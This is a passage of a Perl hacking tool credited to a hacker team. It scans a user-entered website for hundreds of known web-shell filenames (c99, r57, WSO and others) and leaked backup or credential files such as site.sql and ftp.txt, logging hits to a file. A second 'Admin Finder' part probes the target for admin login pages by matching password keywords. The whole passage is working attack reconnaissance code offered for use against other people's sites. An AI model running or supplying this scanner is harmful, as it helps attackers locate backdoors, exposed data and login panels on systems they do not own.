3714. '/includes/tmp/Sym.php',
3715. '/includes/cp.php',
3716. '/includes/tmp/madspotshell.php',
3717. '/includes/tmp/root.php',
3718. '/includes/tmp/whmcs.php',
3719. '/includes/tmp/index.php',
3720. '/includes/tmp/2.php',
3721. '/includes/tmp/dz.php',
3722. '/includes/tmp/cpn.php',
3723. '/includes/tmp/changeall.php',
3724. '/includes/tmp/Cgishell.pl',
3725. '/includes/tmp/sql.php',
3726. '/includes/0day.php',
3727. '/includes/tmp/admin.php',
3728. '/includes/L3b.php',
3729. '/includes/d.php',
3730. '/includes/tmp/d.php',
3731. '/includes/tmp/L3b.php',
3732. '/includes/sado.php',
3733. '/includes/admin1.php',
3734. '/includes/upload.php',
3735. '/includes/up.php',
3736. '/includes/vb.zip',
3737. '/includes/vb.rar',
3738. '/includes/admin2.asp',
3739. '/includes/uploads.php',
3740. '/includes/sa.php',
3741. '/includes/sysadmins/',
3742. '/includes/admin1/',
3743. '/includes/sniper.php',
3744. '/includes/images/Sym.php',
3745. '/includes//r57.php',
3746. '/includes/gzaa_spysl',
3747. '/includes/sql-new.php',
3748. '/includes//shell.php',
3749. '/includes//sa.php',
3750. '/includes//admin.php',
3751. '/includes//sa2.php',
3752. '/includes//2.php',
3753. '/includes//gaza.php',
3754. '/includes//up.php',
3755. '/includes//upload.php',
3756. '/includes//uploads.php',
3757. '/includes/shell.php',
3758. '/includes//amad.php',
3759. '/includes//t00.php',
3760. '/includes//dz.php',
3761. '/includes//site.rar',
3762. '/includes//Black.php',
3763. '/includes//site.tar.gz',
3764. '/includes//home.zip',
3765. '/includes//home.rar',
3766. '/includes//home.tar',
3767. '/includes//home.tar.gz',
3768. '/includes//forum.zip',
3769. '/includes//forum.rar',
3770. '/includes//forum.tar',
3771. '/includes//forum.tar.gz',
3772. '/includes//test.txt',
3773. '/includes//ftp.txt',
3774. '/includes//user.txt',
3775. '/includes//site.txt',
3776. '/includes//error_log',
3777. '/includes//error',
3778. '/includes//cpanel',
3779. '/includes//awstats',
3780. '/includes//site.sql',
3781. '/includes//vb.sql',
3782. '/includes//forum.sql',
3783. '/includes/r00t-s3c.php',
3784. '/includes/c.php',
3785. '/includes//backup.sql',
3786. '/includes//back.sql',
3787. '/includes//data.sql',
3788. '/includes/wp.rar/',
3789. '/includes/asp.aspx',
3790. '/includes/tmp/vaga.php',
3791. '/includes/tmp/killer.php',
3792. '/includes/whmcs.php',
3793. '/includes/abuhlail.php',
3794. '/includes/tmp/killer.php',
3795. '/includes/tmp/domaine.pl',
3796. '/includes/tmp/domaine.php',
3797. '/includes/useradmin/',
3798. '/includes/tmp/d0maine.php',
3799. '/includes/d0maine.php',
3800. '/includes/tmp/sql.php',
3801. '/includes/X.php',
3802. '/includes/123.php',
3803. '/includes/m.php',
3804. '/includes/b.php',
3805. '/includes/up.php',
3806. '/includes/tmp/dz1.php',
3807. '/includes/dz1.php',
3808. '/includes/forum.zip',
3809. '/includes/Symlink.php',
3810. '/includes/Symlink.pl',
3811. '/includes/forum.rar',
3812. '/includes/joomla.zip',
3813. '/includes/joomla.rar',
3814. '/includes/wp.php',
3815. '/includes/buck.sql',
3816. '/includes/sysadmin.php',
3817. '/includes/images/c99.php',
3818. '/includes/xd.php',
3819. '/includes/c100.php',
3820. '/includes/spy.aspx',
3821. '/includes/xd.php',
3822. '/includes/tmp/xd.php',
3823. '/includes/sym/root/home/',
3824. '/includes/billing/killer.php',
3825. '/includes/tmp/upload.php',
3826. '/includes/tmp/admin.php',
3827. '/includes/Server.php',
3828. '/includes/tmp/uploads.php',
3829. '/includes/tmp/up.php',
3830. '/includes/Server/',
3831. '/includes/wp-admin/c99.php',
3832. '/includes/tmp/priv8.php',
3833. '/includes/priv8.php',
3834. '/includes/cgi.pl/',
3835. '/includes/tmp/cgi.pl',
3836. '/includes/downloads/dom.php',
3837. '/includes/webadmin.html',
3838. '/includes/admins.php',
3839. '/includes/bluff.php',
3840. '/includes/king.jeen',
3841. '/includes/admins/',
3842. '/includes/admins.asp',
3843. '/includes/admins.php',
3844. '/includes/wp.zip',
3845. '/includes/',
3846. '/templates/rhuk_milkyway/WSO.php',
3847. '/templates/rhuk_milkyway/dz.php',
3848. '/templates/rhuk_milkyway/DZ.php',
3849. '/templates/rhuk_milkyway/cpanel.php',
3850. '/templates/rhuk_milkyway/cpn.php',
3851. '/templates/rhuk_milkyway/sos.php',
3852. '/templates/rhuk_milkyway/term.php',
3853. '/templates/rhuk_milkyway/Sec-War.php',
3854. '/templates/rhuk_milkyway/sql.php',
3855. '/templates/rhuk_milkyway/ssl.php',
3856. '/templates/rhuk_milkyway/mysql.php',
3857. '/templates/rhuk_milkyway/WolF.php',
3858. '/templates/rhuk_milkyway/madspot.php',
3859. '/templates/rhuk_milkyway/Cgishell.pl',
3860. '/templates/rhuk_milkyway/killer.php',
3861. '/templates/rhuk_milkyway/changeall.php',
3862. '/templates/rhuk_milkyway/2.php',
3863. '/templates/rhuk_milkyway/Sh3ll.php',
3864. '/templates/rhuk_milkyway/dz0.php',
3865. '/templates/rhuk_milkyway/dam.php',
3866. '/templates/rhuk_milkyway/user.php',
3867. '/templates/rhuk_milkyway/dom.php',
3868. '/templates/rhuk_milkyway/whmcs.php',
3869. '/templates/rhuk_milkyway/vb.zip',
3870. '/templates/rhuk_milkyway/r00t.php',
3871. '/templates/rhuk_milkyway/c99.php',
3872. '/templates/rhuk_milkyway/gaza.php',
3873. '/templates/rhuk_milkyway/1.php',
3874. '/templates/rhuk_milkyway/d0mains.php',
3875. '/templates/rhuk_milkyway/madspotshell.php',
3876. '/templates/rhuk_milkyway/info.php',
3877. '/templates/rhuk_milkyway/egyshell.php',
3878. '/templates/rhuk_milkyway/Sym.php',
3879. '/templates/rhuk_milkyway/c22.php',
3880. '/templates/rhuk_milkyway/c100.php',
3881. '/templates/rhuk_milkyway/configuration.php',
3882. '/templates/rhuk_milkyway/g.php',
3883. '/templates/rhuk_milkyway/xx.pl',
3884. '/templates/rhuk_milkyway/ls.php',
3885. '/templates/rhuk_milkyway/Cpanel.php',
3886. '/templates/rhuk_milkyway/k.php',
3887. '/templates/rhuk_milkyway/zone-h.php',
3888. '/templates/rhuk_milkyway/tmp/user.php',
3889. '/templates/rhuk_milkyway/tmp/Sym.php',
3890. '/templates/rhuk_milkyway/cp.php',
3891. '/templates/rhuk_milkyway/tmp/madspotshell.php',
3892. '/templates/rhuk_milkyway/tmp/root.php',
3893. '/templates/rhuk_milkyway/tmp/whmcs.php',
3894. '/templates/rhuk_milkyway/tmp/index.php',
3895. '/templates/rhuk_milkyway/tmp/2.php',
3896. '/templates/rhuk_milkyway/tmp/dz.php',
3897. '/templates/rhuk_milkyway/tmp/cpn.php',
3898. '/templates/rhuk_milkyway/tmp/changeall.php',
3899. '/templates/rhuk_milkyway/tmp/Cgishell.pl',
3900. '/templates/rhuk_milkyway/tmp/sql.php',
3901. '/templates/rhuk_milkyway/0day.php',
3902. '/templates/rhuk_milkyway/tmp/admin.php',
3903. '/templates/rhuk_milkyway/L3b.php',
3904. '/templates/rhuk_milkyway/d.php',
3905. '/templates/rhuk_milkyway/tmp/d.php',
3906. '/templates/rhuk_milkyway/tmp/L3b.php',
3907. '/templates/rhuk_milkyway/sado.php',
3908. '/templates/rhuk_milkyway/admin1.php',
3909. '/templates/rhuk_milkyway/upload.php',
3910. '/templates/rhuk_milkyway/up.php',
3911. '/templates/rhuk_milkyway/vb.zip',
3912. '/templates/rhuk_milkyway/vb.rar',
3913. '/templates/rhuk_milkyway/admin2.asp',
3914. '/templates/rhuk_milkyway/uploads.php',
3915. '/templates/rhuk_milkyway/sa.php',
3916. '/templates/rhuk_milkyway/sysadmins/',
3917. '/templates/rhuk_milkyway/admin1/',
3918. '/templates/rhuk_milkyway/sniper.php',
3919. '/templates/rhuk_milkyway/images/Sym.php',
3920. '/templates/rhuk_milkyway//r57.php',
3921. '/templates/rhuk_milkyway/gzaa_spysl',
3922. '/templates/rhuk_milkyway/sql-new.php',
3923. '/templates/rhuk_milkyway//shell.php',
3924. '/templates/rhuk_milkyway//sa.php',
3925. '/templates/rhuk_milkyway//admin.php',
3926. '/templates/rhuk_milkyway//sa2.php',
3927. '/templates/rhuk_milkyway//2.php',
3928. '/templates/rhuk_milkyway//gaza.php',
3929. '/templates/rhuk_milkyway//up.php',
3930. '/templates/rhuk_milkyway//upload.php',
3931. '/templates/rhuk_milkyway//uploads.php',
3932. '/templates/rhuk_milkyway/shell.php',
3933. '/templates/rhuk_milkyway//amad.php',
3934. '/templates/rhuk_milkyway//t00.php',
3935. '/templates/rhuk_milkyway//dz.php',
3936. '/templates/rhuk_milkyway//site.rar',
3937. '/templates/rhuk_milkyway//Black.php',
3938. '/templates/rhuk_milkyway//site.tar.gz',
3939. '/templates/rhuk_milkyway//home.zip',
3940. '/templates/rhuk_milkyway//home.rar',
3941. '/templates/rhuk_milkyway//home.tar',
3942. '/templates/rhuk_milkyway//home.tar.gz',
3943. '/templates/rhuk_milkyway//forum.zip',
3944. '/templates/rhuk_milkyway//forum.rar',
3945. '/templates/rhuk_milkyway//forum.tar',
3946. '/templates/rhuk_milkyway//forum.tar.gz',
3947. '/templates/rhuk_milkyway//test.txt',
3948. '/templates/rhuk_milkyway//ftp.txt',
3949. '/templates/rhuk_milkyway//user.txt',
3950. '/templates/rhuk_milkyway//site.txt',
3951. '/templates/rhuk_milkyway//error_log',
3952. '/templates/rhuk_milkyway//error',
3953. '/templates/rhuk_milkyway//cpanel',
3954. '/templates/rhuk_milkyway//awstats',
3955. '/templates/rhuk_milkyway//site.sql',
3956. '/templates/rhuk_milkyway//vb.sql',
3957. '/templates/rhuk_milkyway//forum.sql',
3958. '/templates/rhuk_milkyway/r00t-s3c.php',
3959. '/templates/rhuk_milkyway/c.php',
3960. '/templates/rhuk_milkyway//backup.sql',
3961. '/templates/rhuk_milkyway//back.sql',
3962. '/templates/rhuk_milkyway//data.sql',
3963. '/templates/rhuk_milkyway/wp.rar/',
3964. '/templates/rhuk_milkyway/asp.aspx',
3965. '/templates/rhuk_milkyway/tmp/vaga.php',
3966. '/templates/rhuk_milkyway/tmp/killer.php',
3967. '/templates/rhuk_milkyway/whmcs.php',
3968. '/templates/rhuk_milkyway/abuhlail.php',
3969. '/templates/rhuk_milkyway/tmp/killer.php',
3970. '/templates/rhuk_milkyway/tmp/domaine.pl',
3971. '/templates/rhuk_milkyway/tmp/domaine.php',
3972. '/templates/rhuk_milkyway/useradmin/',
3973. '/templates/rhuk_milkyway/tmp/d0maine.php',
3974. '/templates/rhuk_milkyway/d0maine.php',
3975. '/templates/rhuk_milkyway/tmp/sql.php',
3976. '/templates/rhuk_milkyway/X.php',
3977. '/templates/rhuk_milkyway/123.php',
3978. '/templates/rhuk_milkyway/m.php',
3979. '/templates/rhuk_milkyway/b.php',
3980. '/templates/rhuk_milkyway/up.php',
3981. '/templates/rhuk_milkyway/tmp/dz1.php',
3982. '/templates/rhuk_milkyway/dz1.php',
3983. '/templates/rhuk_milkyway/forum.zip',
3984. '/templates/rhuk_milkyway/Symlink.php',
3985. '/templates/rhuk_milkyway/Symlink.pl',
3986. '/templates/rhuk_milkyway/forum.rar',
3987. '/templates/rhuk_milkyway/joomla.zip',
3988. '/templates/rhuk_milkyway/joomla.rar',
3989. '/templates/rhuk_milkyway/wp.php',
3990. '/templates/rhuk_milkyway/buck.sql',
3991. '/templates/rhuk_milkyway/sysadmin.php',
3992. '/templates/rhuk_milkyway/images/c99.php',
3993. '/templates/rhuk_milkyway/xd.php',
3994. '/templates/rhuk_milkyway/c100.php',
3995. '/templates/rhuk_milkyway/spy.aspx',
3996. '/templates/rhuk_milkyway/xd.php',
3997. '/templates/rhuk_milkyway/tmp/xd.php',
3998. '/templates/rhuk_milkyway/sym/root/home/',
3999. '/templates/rhuk_milkyway/billing/killer.php',
4000. '/templates/rhuk_milkyway/tmp/upload.php',
4001. '/templates/rhuk_milkyway/tmp/admin.php',
4002. '/templates/rhuk_milkyway/Server.php',
4003. '/templates/rhuk_milkyway/tmp/uploads.php',
4004. '/templates/rhuk_milkyway/tmp/up.php',
4005. '/templates/rhuk_milkyway/Server/',
4006. '/templates/rhuk_milkyway/wp-admin/c99.php',
4007. '/templates/rhuk_milkyway/tmp/priv8.php',
4008. '/templates/rhuk_milkyway/priv8.php',
4009. '/templates/rhuk_milkyway/cgi.pl/',
4010. '/templates/rhuk_milkyway/tmp/cgi.pl',
4011. '/templates/rhuk_milkyway/downloads/dom.php',
4012. '/templates/rhuk_milkyway/webadmin.html',
4013. '/templates/rhuk_milkyway/admins.php',
4014. '/templates/rhuk_milkyway/bluff.php',
4015. '/templates/rhuk_milkyway/king.jeen',
4016. '/templates/rhuk_milkyway/admins/',
4017. '/templates/rhuk_milkyway/admins.asp',
4018. '/templates/rhuk_milkyway/admins.php',
4019. '/templates/rhuk_milkyway/wp.zip',
4020. '/templates/rhuk_milkyway/','WSO.php',
4021. 'a.php',
4022. 'z.php',
4023. 'e.php',
4024. 'r.php',
4025. 't.php',
4026. 'y.php',
4027. 'u.php',
4028. 'i.php',
4029. 'o.php',
4030. 'p.php',
4031. 'q.php',
4032. 's.php',
4033. 'd.php',
4034. 'f.php',
4035. 'g.php',
4036. 'h.php',
4037. 'j.php',
4038. 'k.php',
4039. 'l.php',
4040. 'm.php',
4041. 'w.php',
4042. 'x.php',
4043. 'c.php',
4044. 'v.php',
4045. 'b.php',
4046. 'n.php',
4047. '1.php',
4048. '2.php',
4049. '3.php',
4050. '4.php',
4051. '5.php',
4052. '6.php',
4053. '7.php',
4054. '8.php',
4055. '9.php',
4056. '10.php',
4057. '12.php',
4058. '11.php',
4059. '1234.php',);
4060.  
4061.  
4062. foreach $com(@path){
4063.  
4064. $url = $site.$com;
4065. $req = HTTP::Request->new(GET=>$url);
4066. $useragent = LWP::UserAgent->new();
4067.  
4068. $response = $useragent->request($req);
4069.  
4070. if ($response->is_success){
4071. print "$com\n";
4072. $url = substr($url, $com + 13);
4073. $com = substr($url, 0, index($url, '"'));
4074. open (txt,">>done.txt");
4075. print txt $com,"\n";
4076. close(txt);
4077. print "=> Dir Found : $url\n";
4078. }
4079. else {
4080. print "=> Not Found : $com\n";
4081. }
4082. }}
4083. }
4084. if($targett eq '2')
4085. {
4086. system('cls');
4087. system('title Admin Finder');
4088. {
4089. print " Admin Finder \n";
4090. use HTTP::Request;
4091. use LWP::UserAgent;
4092.  
4093. system('cls');
4094. system('title Admin Finder Rec0ded byAMIRAL');
4095.  
4096. print"\n";
4097. print "--------------------------------------------------------\n" ;
4098. print "[*]----------Admin Finder Rec0ded by amiral--------[*]\n" ;
4099. print "[*]------------- ReCoded By ahmed ----------[*]\n" ;
4100. print "[*]------ SEA| TEAM---------[*]\n" ;
4101. print "[*]------------ Gr33tz MR | wolf-----[*]\n" ;
4102. print "********************************************************\n" ;
4103. print "\n";
4104.  
4105. print "~# Enter The Site\n* ex: www.domaine.com ou www.domaine.com/path\n-> ";
4106. $site=<STDIN>;
4107. chomp $site;
4108.  
4109. print "\n";
4110. print "~ Enter Type The Site \n* ex: asp, php, cfm\n-> ";
4111. $code=<STDIN>;
4112. chomp($code);
4113.  
4114. if ( $site !~ /^http:/ ) {
4115. $site = 'http://' . $site;
4116. }
4117. if ( $site !~ /\/$/ ) {
4118. $site = $site . '/';
4119. }
4120. print "\n";
4121.  
4122. print "->Your Target: $site\n";
4123. print "->Type Website: $code\n";
4124. print "->Loading\n\n\n";
4125.  
4126. if($code eq "asp"){
4127.  
4128. @path1=('cpanel','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
4129. 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
4130. 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
4131. 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
4132. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
4133. 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
4134. 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
4135. 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
4136. 'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
4137. 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
4138. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
4139. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
4140. 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
4141. 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
4142. 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
4143. 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
4144. 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
4145. 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
4146. 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
4147. );
4148.  
4149. foreach $ways(@path1){
4150.  
4151. $final=$site.$ways;
4152.  
4153. my $req=HTTP::Request->new(GET=>$final);
4154. my $ua=LWP::UserAgent->new();
4155. $ua->timeout(30);
4156. my $response=$ua->request($req);
4157.  
4158. if($response->content =~ /Username/ ||
4159. $response->content =~ /Password/ ||
4160. $response->content =~ /username/ ||
4161. $response->content =~ /password/ ||
4162. $response->content =~ /USERNAME/ ||
4163. $response->content =~ /PASSWORD/ ||
4164. $response->content =~ /Senha/ ||
4165. $response->content =~ /senha/ ||
4166. $response->content =~ /Personal/ ||
4167. $response->content =~ /Usuario/ ||
4168. $response->content =~ /Clave/ ||
4169. $response->content =~ /Usager/ ||
4170. $response->content =~ /usager/ ||
4171. $response->content =~ /Sing/ ||
4172. $response->content =~ /passe/ ||
4173. $response->content =~ /P\/W/ ||
4174. $response->content =~ /Admin Password/
4175. ){
4176. print " \n [+] Found -> $final\n\n";
4177. }else{
4178. print "[-] Not Found <- $final\n";
4179. }
4180. }
4181. }
4182.  
4183.  
4184.  
4185.  
4186. # -------------------------------------------------------
4187. # -------------------test cfm ---------------------------|
4188. # -------------------------------------------------------
4189.  
4190.  
4191.  
4192.  
4193.  
4194. if($code eq "cfm"){
4195.  
4196. @path1=('cpanel','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
4197. 'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
4198. 'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
4199. 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
4200. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
4201. 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
4202. 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
4203. 'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm',
4204. 'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm',
4205. 'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
4206. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html',
4207. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
4208. 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
4209. 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm',
4210. 'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm',
4211. 'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html',
4212. 'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm',
4213. 'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm',
4214. 'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html'
4215. );
4216.  
4217. foreach $ways(@path1){
4218.  
4219. $final=$site.$ways;
4220.  
4221. my $req=HTTP::Request->new(GET=>$final);
4222. my $ua=LWP::UserAgent->new();
4223. $ua->timeout(30);
4224. my $response=$ua->request($req);
4225.  
4226. if($response->content =~ /Username/ ||
4227. $response->content =~ /Password/ ||
4228. $response->content =~ /username/ ||
4229. $response->content =~ /password/ ||
4230. $response->content =~ /USERNAME/ ||
4231. $response->content =~ /PASSWORD/ ||
4232. $response->content =~ /Senha/ ||
4233. $response->content =~ /senha/ ||
4234. $response->content =~ /Personal/ ||
4235. $response->content =~ /Usuario/ ||
4236. $response->content =~ /Clave/ ||
4237. $response->content =~ /Usager/ ||
4238. $response->content =~ /usager/ ||
4239. $response->content =~ /Sing/ ||
4240. $response->content =~ /passe/ ||
4241. $response->content =~ /P\/W/ ||
4242. $response->content =~ /Admin Password/
4243. ){
4244. print " \n [+] Found -> $final\n\n";
4245. }else{
4246. print "[-] Not Found <- $final\n";
4247. }
4248. }
4249. }
4250.  
4251.  
4252.  
4253.  
4254.  
4255. # -------------------------------------------------------
4256. #--------------------------/test-------------------------|
4257. # -------------------------------------------------------
4258.  
4259.  
4260. if($code eq "php"){
4261.  
4262. @path2=('cpanel','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
4263. 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
4264. 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
4265. 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
4266. 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
4267. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
4268. 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
4269. 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
4270. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
4271. 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
4272. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
4273. 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
4274. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
4275. 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
4276. 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
4277. 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
4278. 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
4279. 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
4280. 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
4281. );
4282.  
4283. foreach $ways(@path2){
4284.  
4285. $final=$site.$ways;
4286.  
4287. my $req=HTTP::Request->new(GET=>$final);
4288. my $ua=LWP::UserAgent->new();
4289. $ua->timeout(30);
4290. my $response=$ua->request($req);
4291.  
4292. if($response->content =~ /Username/ ||
4293. $response->content =~ /Password/ ||
4294. $response->content =~ /username/ ||
4295. $response->content =~ /password/ ||
4296. $response->content =~ /USERNAME/ ||
4297. $response->content =~ /PASSWORD/ ||
4298. $response->content =~ /Senha/ ||
4299. $response->content =~ /senha/ ||
4300. $response->content =~ /Personal/ ||
4301. $response->content =~ /Usuario/ ||
4302. $response->content =~ /Clave/ ||
4303. $response->content =~ /Usager/ ||
4304. $response->content =~ /usager/ ||
4305. $response->content =~ /Sing/ ||
4306. $response->content =~ /passe/ ||
4307. $response->content =~ /P\/W/ ||
4308. $response->content =~ /Admin Password/
4309. ){
4310. print " \n [+] Found -> $final\n\n";
4311. }else{
4312. print "[-] Not Found <- $final\n";
4313. }
4314. }
4315. kill("STOP",NULL);
4316. }}
4317. }